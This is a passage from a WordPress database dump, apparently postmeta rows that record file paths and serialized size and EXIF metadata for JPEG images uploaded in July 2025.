:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5080,1832,'_wp_attached_file','2025/07/S__9871387_0.jpg'),
(5081,1832,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871387_0.jpg\";s:8:\"filesize\";i:427133;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871387_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21507;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871387_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155927;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871387_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8611;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871387_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99844;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871387_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24585;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5082,1833,'_wp_attached_file','2025/07/S__9871376_0.jpg'),
(5083,1833,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871376_0.jpg\";s:8:\"filesize\";i:431510;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871376_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21582;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871376_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156501;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871376_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8714;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871376_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99868;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871376_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24079;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5084,1834,'_wp_attached_file','2025/07/S__9871389_0.jpg'),
(5085,1834,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871389_0.jpg\";s:8:\"filesize\";i:416584;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871389_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21073;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871389_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152462;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871389_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8480;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871389_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97102;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871389_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5086,1835,'_wp_attached_file','2025/07/S__9871390_0.jpg'),
(5087,1835,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871390_0.jpg\";s:8:\"filesize\";i:416584;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871390_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21073;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871390_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152462;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871390_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8480;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871390_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97102;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871390_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5088,1836,'_wp_attached_file','2025/07/S__9871409_0.jpg'),
(5089,1836,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871409_0.jpg\";s:8:\"filesize\";i:429510;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871409_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21686;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871409_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157070;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871409_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9040;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871409_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100042;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871409_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25121;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5090,1837,'_wp_attached_file','2025/07/S__9871411_0.jpg'),
(5091,1837,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871411_0.jpg\";s:8:\"filesize\";i:423359;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871411_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21473;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871411_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155272;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871411_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871411_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99015;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871411_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24674;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5092,1838,'_wp_attached_file','2025/07/S__9871410_0.jpg'),
(5093,1838,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871410_0.jpg\";s:8:\"filesize\";i:429510;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871410_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21686;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871410_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157070;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871410_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9040;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871410_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100042;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871410_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25121;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5094,1839,'_wp_attached_file','2025/07/S__9871412_0.jpg'),
(5095,1839,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871412_0.jpg\";s:8:\"filesize\";i:423359;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871412_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21473;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871412_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155272;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871412_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871412_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99015;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871412_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24674;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5096,1840,'_wp_attached_file','2025/07/S__9871414_0.jpg'),
(5097,1840,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871414_0.jpg\";s:8:\"filesize\";i:438056;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871414_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21656;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871414_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159903;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871414_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8963;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871414_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101675;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871414_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25307;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5098,1841,'_wp_attached_file','2025/07/S__9871413_0.jpg'),
(5099,1841,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871413_0.jpg\";s:8:\"filesize\";i:438056;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871413_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21656;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871413_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159903;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871413_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8963;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871413_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101675;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871413_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25307;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5100,1842,'_wp_attached_file','2025/07/S__9871415_0.jpg'),
(5101,1842,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871415_0.jpg\";s:8:\"filesize\";i:431432;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871415_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21899;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871415_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158609;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871415_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9193;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871415_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101487;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871415_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25513;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5102,1843,'_wp_attached_file','2025/07/S__9871416_0.jpg'),
(5103,1843,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871416_0.jpg\";s:8:\"filesize\";i:431432;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871416_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21899;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871416_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158609;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871416_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9193;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871416_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101487;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871416_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25513;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5104,1844,'_wp_attached_file','2025/07/S__9871419_0.jpg'),
(5105,1844,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871419_0.jpg\";s:8:\"filesize\";i:431408;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871419_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22280;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871419_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158875;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871419_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8859;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871419_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871419_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5106,1845,'_wp_attached_file','2025/07/S__9871417_0.jpg'),
(5107,1845,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871417_0.jpg\";s:8:\"filesize\";i:416936;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871417_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22423;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871417_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155927;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871417_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9002;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871417_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100769;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871417_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24572;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5108,1846,'_wp_attached_file','2025/07/S__9871418_0.jpg'),
(5109,1846,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871418_0.jpg\";s:8:\"filesize\";i:416936;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871418_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22423;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871418_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155927;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871418_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9002;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871418_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100769;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871418_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24572;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"f